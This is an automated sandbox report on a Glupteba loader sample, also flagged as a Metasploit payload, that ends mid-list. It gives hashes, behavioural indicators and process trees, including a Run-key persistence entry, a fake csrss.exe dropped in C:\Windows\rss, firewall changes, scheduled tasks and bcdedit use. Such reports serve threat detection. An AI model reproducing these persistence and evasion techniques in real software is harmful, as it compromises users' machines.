glupteba | 23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b

General

Target

23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
Size

3.9MB
MD5

de8c59730bb0557ef92f004b1fe2eecf
SHA1

334a2f8d11a7aa7309f31fe56555baf49ae7d1f9
SHA256

23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b
SHA512

47dcacfd705a02b24d32993aecc01f08c699c0363029885865ad4ae482b5103c363c4c3c84f41d7749ebe3ccb2c505ac73e30542c7ac8ef0de0ac6834fc851ee
SSDEEP

98304:8qnCPgJXetL7HPcsoTscYdniOFytgLG7kJnRVVt8tMV95ykE5YN:pYg2L7vcRfYliOYt77wnD38tMV95yk5N

Score

10^/10

glupteba metasploit backdoor discovery dropper evasion loader persistence trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4828-133-0x0000000001350000-0x0000000001B54000-memory.dmp	family_glupteba
behavioral2/memory/4828-134-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/4828-136-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/3156-138-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/3156-144-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/5092-146-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba
behavioral2/memory/5092-152-0x0000000000400000-0x0000000000C1E000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 1664 created 4828	1664	svchost.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
PID 1664 created 5092	1664	svchost.exe	csrss.exe
PID 1664 created 5092	1664	svchost.exe	csrss.exe
PID 1664 created 5092	1664	svchost.exe	csrss.exe

Executes dropped EXE 2 IoCs

Processes:

csrss.exepatch.exe

pid process

5092 csrss.exe
1500 patch.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

1228 netsh.exe

pid	process
5092	csrss.exe
1500	patch.exe

pid	process
1228	netsh.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RedFrost = "\"C:\\Windows\\rss\\csrss.exe\""	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

812 bcdedit.exe

pid	process
812	bcdedit.exe

Drops file in Windows directory 2 IoCs

Processes:

23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe

description	ioc	process
File opened for modification	C:\Windows\rss	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
File created	C:\Windows\rss\csrss.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe

Program crash 57 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4752	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
816	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
1032	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
3916	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
1408	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
1120	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
3540	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
2876	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
4412	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
2252	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
2916	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
4924	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
1488	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
1872	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
4896	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
2940	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
428	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
764	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
1316	4828	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
3432	3156	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
1140	3156	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
4360	3156	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
4236	3156	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
4248	3156	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
4264	3156	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
4288	3156	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
3700	3156	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
4436	3156	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
4396	3156	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
4644	3156	WerFault.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
2764	5092	WerFault.exe	csrss.exe
5044	5092	WerFault.exe	csrss.exe
2420	5092	WerFault.exe	csrss.exe
4976	5092	WerFault.exe	csrss.exe
4356	5092	WerFault.exe	csrss.exe
4020	5092	WerFault.exe	csrss.exe
228	5092	WerFault.exe	csrss.exe
5048	5092	WerFault.exe	csrss.exe
2012	5092	WerFault.exe	csrss.exe
4052	5092	WerFault.exe	csrss.exe
1220	5092	WerFault.exe	csrss.exe
4608	5092	WerFault.exe	csrss.exe
1280	5092	WerFault.exe	csrss.exe
4856	5092	WerFault.exe	csrss.exe
1084	5092	WerFault.exe	csrss.exe
1012	5092	WerFault.exe	csrss.exe
2352	5092	WerFault.exe	csrss.exe
672	5092	WerFault.exe	csrss.exe
3124	5092	WerFault.exe	csrss.exe
2564	5092	WerFault.exe	csrss.exe
640	5092	WerFault.exe	csrss.exe
4964	5092	WerFault.exe	csrss.exe
2160	5092	WerFault.exe	csrss.exe
4544	5092	WerFault.exe	csrss.exe
1312	5092	WerFault.exe	csrss.exe
4328	5092	WerFault.exe	csrss.exe
3428	5092	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3916 schtasks.exe
4016 schtasks.exe

pid	process
3916	schtasks.exe
4016	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	csrss.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.execsrss.exe

pid	process
4828	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
4828	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
3156	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
3156	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
5092	csrss.exe
5092	csrss.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exesvchost.execsrss.exe

description	pid	process
Token: SeDebugPrivilege	4828	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
Token: SeImpersonatePrivilege	4828	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
Token: SeTcbPrivilege	1664	svchost.exe
Token: SeTcbPrivilege	1664	svchost.exe
Token: SeBackupPrivilege	1664	svchost.exe
Token: SeRestorePrivilege	1664	svchost.exe
Token: SeBackupPrivilege	1664	svchost.exe
Token: SeRestorePrivilege	1664	svchost.exe
Token: SeBackupPrivilege	1664	svchost.exe
Token: SeRestorePrivilege	1664	svchost.exe
Token: SeBackupPrivilege	1664	svchost.exe
Token: SeRestorePrivilege	1664	svchost.exe
Token: SeSystemEnvironmentPrivilege	5092	csrss.exe
Token: SeBackupPrivilege	1664	svchost.exe
Token: SeRestorePrivilege	1664	svchost.exe
Token: SeBackupPrivilege	1664	svchost.exe
Token: SeRestorePrivilege	1664	svchost.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

svchost.exe23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.execmd.execsrss.exe

description	pid	process	target process
PID 1664 wrote to memory of 3156	1664	svchost.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
PID 1664 wrote to memory of 3156	1664	svchost.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
PID 1664 wrote to memory of 3156	1664	svchost.exe	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
PID 3156 wrote to memory of 2152	3156	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe	cmd.exe
PID 3156 wrote to memory of 2152	3156	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe	cmd.exe
PID 2152 wrote to memory of 1228	2152	cmd.exe	netsh.exe
PID 2152 wrote to memory of 1228	2152	cmd.exe	netsh.exe
PID 3156 wrote to memory of 5092	3156	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe	csrss.exe
PID 3156 wrote to memory of 5092	3156	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe	csrss.exe
PID 3156 wrote to memory of 5092	3156	23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe	csrss.exe
PID 1664 wrote to memory of 4016	1664	svchost.exe	schtasks.exe
PID 1664 wrote to memory of 4016	1664	svchost.exe	schtasks.exe
PID 1664 wrote to memory of 3916	1664	svchost.exe	schtasks.exe
PID 1664 wrote to memory of 3916	1664	svchost.exe	schtasks.exe
PID 1664 wrote to memory of 1500	1664	svchost.exe	patch.exe
PID 1664 wrote to memory of 1500	1664	svchost.exe	patch.exe
PID 5092 wrote to memory of 812	5092	csrss.exe	bcdedit.exe
PID 5092 wrote to memory of 812	5092	csrss.exe	bcdedit.exe

C:\Users\Admin\AppData\Local\Temp\23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
"C:\Users\Admin\AppData\Local\Temp\23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 328
2⤵
- Program crash
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 332
2⤵
- Program crash
PID:816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 332
2⤵
- Program crash
PID:1032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 604
2⤵
- Program crash
PID:3916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 704
2⤵
- Program crash
PID:1408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 692
2⤵
- Program crash
PID:1120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 736
2⤵
- Program crash
PID:3540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 692
2⤵
- Program crash
PID:2876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 692
2⤵
- Program crash
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 804
2⤵
- Program crash
PID:2252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 680
2⤵
- Program crash
PID:2916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 780
2⤵
- Program crash
PID:4924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 640
2⤵
- Program crash
PID:1488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 776
2⤵
- Program crash
PID:1872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 668
2⤵
- Program crash
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 772
2⤵
- Program crash
PID:2940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 620
2⤵
- Program crash
PID:428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 888
2⤵
- Program crash
PID:764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 856
2⤵
- Program crash
PID:1316

C:\Users\Admin\AppData\Local\Temp\23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe
"C:\Users\Admin\AppData\Local\Temp\23d614dbffa822a5ae066b1673fb7c5ea73de12cf01c6c4327bbb951ceb6240b.exe"
2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 292
3⤵
- Program crash
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 316
3⤵
- Program crash
PID:1140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 300
3⤵
- Program crash
PID:4360

C:\Windows\SysWOW64\WerFault.exe
